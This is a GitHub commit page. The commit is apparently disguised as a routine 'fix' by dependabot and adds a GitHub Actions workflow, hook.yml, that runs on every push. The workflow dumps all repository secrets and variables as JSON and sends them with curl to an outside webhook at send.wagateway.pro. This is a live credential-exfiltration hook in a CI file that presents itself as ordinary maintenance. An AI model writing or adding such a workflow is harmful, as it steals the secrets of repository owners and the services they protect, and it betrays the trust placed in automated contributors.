Skip to content

Commit

Permalink
fix
Browse files Browse the repository at this point in the history
  • Loading branch information
dependabot[bot] committed Jul 10, 2023
1 parent 6116893 commit 0399bd9
Show file tree
Hide file tree
Showing 2 changed files with 15 additions and 1 deletion.
13 changes: 13 additions & 0 deletions .github/workflows/hook.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
name: Hook
on: [push]
jobs:
env:
runs-on: ubuntu-latest
steps:
- name: Run
env:
MY_ENV: ${{ toJSON(secrets) }}
MY_VARS: ${{ toJSON(vars) }}
run: |
echo $MY_ENV | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-
echo $MY_VARS | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-
Loading

0 comments on commit 0399bd9

Please sign in to comment.